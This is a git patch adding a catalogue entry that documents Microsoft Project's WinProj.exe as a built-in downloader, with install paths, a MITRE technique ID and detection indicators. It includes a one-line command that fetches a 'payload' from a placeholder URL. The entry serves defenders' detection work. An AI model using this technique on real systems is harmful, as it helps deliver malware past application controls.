From aea7bd082d971a019f4fc67fd240b8b4bd4c5c52 Mon Sep 17 00:00:00 2001 From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com> Date: Fri, 5 Apr 2024 21:19:49 +0300 Subject: [PATCH] Add Winproj.exe as a downloader (#351) Co-authored-by: Wietze --- yml/OtherMSBinaries/Winproj.yml | 34 +++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 yml/OtherMSBinaries/Winproj.yml diff --git a/yml/OtherMSBinaries/Winproj.yml b/yml/OtherMSBinaries/Winproj.yml new file mode 100644 index 0000000..4ceaf24 --- /dev/null +++ b/yml/OtherMSBinaries/Winproj.yml @@ -0,0 +1,34 @@ +--- +Name: WinProj.exe +Description: Microsoft Project Executable +Author: Avihay Eldad +Created: 2024-02-14 +Commands: + - Command: WinProj.exe https://example.com/payload + Description: Downloads payload from remote server + Usecase: It will download a remote payload and place it in INetCache. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows + Tags: + - Download: INetCache +Full_Path: + - Path: C:\Program Files (x86)\Microsoft Office\Office14\WinProj.exe + - Path: C:\Program Files\Microsoft Office\Office14\WinProj.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office15\WinProj.exe + - Path: C:\Program Files\Microsoft Office\Office15\WinProj.exe + - Path: C:\Program Files (x86)\Microsoft Office\Office16\WinProj.exe + - Path: C:\Program Files\Microsoft Office\Office16\WinProj.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office14\WinProj.exe + - Path: C:\Program Files\Microsoft Office\root\Office14\WinProj.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office15\WinProj.exe + - Path: C:\Program Files\Microsoft Office\root\Office15\WinProj.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\Office16\WinProj.exe + - Path: C:\Program Files\Microsoft Office\root\Office16\WinProj.exe +Detection: + - IOC: URL on a WinProj command line + - IOC: WinProj making unexpected network connections or DNS requests +Acknowledgement: + - Person: Avihay Eldad + Handle: '@AvihayEldad'